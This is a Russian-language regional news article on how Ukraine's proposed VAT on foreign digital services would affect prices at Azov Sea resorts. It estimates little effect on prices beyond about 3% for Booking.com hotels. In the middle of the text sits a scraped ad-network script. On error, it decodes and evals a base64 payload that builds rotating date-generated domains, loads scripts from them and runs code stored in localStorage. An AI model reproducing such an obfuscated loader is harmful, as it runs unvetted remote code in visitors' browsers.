Как новый «налог на Google» скажется на стоимости отдыха на курортах Азовского моря

В среду, 17 февраля 2021 года, ВРУ в первом чтении приняла законопроект №4184, который вводит НДС на услуги компаний-нерезидентов по типу Google, Netflix, и вероятно Booking.Com.

Как это повлияет на цены на отдых на отечественных курортах, и в частности, в Бердянске, Кирилловке и на Арабатской Стрелке, пишет «Наше Місто» по результату общения с региональными экспертами.

Новый закон дополняет статью 208 НК Украины нормой о налогообложении электронных услуг. Так, согласно этой норме, электронные услуги, которые компании-нерезиденты поставляют физлицам на территории Украины, облагаются НДС (20%). Вероятнее всего под эту норму подпадут услуги Google, Facebook (Instagram) и Booking.Com, но, конечно же, только в том случае если эти компании согласятся зарегистрироваться плательщиками НДС в Украине вместо полного отказа от работы с нашей страной. К тому же, фактического влияния наших налоговых органов на эти компании нет. Поэтому даже сама норма может ограничиться декларациями и не более того.

Но даже если норма будет введена, как и обычно для мировой практики, крупные корпорации вместо того, чтобы платить налоги из своей прибыли, просто переложат НДС на плечи украинцев. То есть, услуги Google, Facebook и Booking.Com в Украине могут стать дороже на 20%.

Если брать морские курорты Украины, то владельцы отелей в большинстве своем пользуются только рекламными услугами Google и Facebook, но доля цены этой рекламы в стоимости жилья в той же Кирилловке зачастую не превышает 0.1-0.5%. То есть, существенного влияния на цену отдыха новый налог иметь не будет. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Если же затронуть отели, которые бронируются через Booking.Com, то здесь уже возможен рост цен примерно на 3% (20% от комиссии Букинга, которая обычно равна 15%). Но с учетом невысокой популярности этого сервиса для внутреннего туризма, большинство потребителей эта проблема не затронет.

заметного роста стоимости номеров на курортах новый «налог на Google» не принесет

«Ни для кого не секрет, что большая часть отелей Кирилловки, Бердянска и Арабатской Стрелки в нарушение международной практики перекладывает комиссию сервиса Booking.Com, которая составляет 15%, на плечи потребителей. То есть, номер, который обычно стоит 1000 гривен на Букинге тот же самый отель выставляет по цене 1175 гривен. Теперь же 15% могут превратиться в 18%, то есть, будет рост цены для конечного потребителя на 3%, но только для отелей, которые НЕ следуют международной практике паритета цен. К сожалению, в наших регионах таких отелей большинство. Для всех остальных категорий потребителей налог на Google лишь незначительно повысит себестоимость услуг, поэтому существенного влияния на цену жилья не будет», — пояснил главный редактор проектов Кирилловка.Укр и Арабатка.UA Евгений Смельчаков.

Таким образом, можно сделать вывод, что новый налог, конечно, дополнительно ляжет на плечи украинцев, но в контексте отдыха на море в Украине влияние этого налога будет минимальным. (adsbygoogle = window.adsbygoogle || []).push({});

Лучшие отели с бассейном на Арабатской стрелке Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/kak-novyj-nalog-na-google-skazhetsya-na-stoimosti-otdyha-na-kurortah-azovskogo-morya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top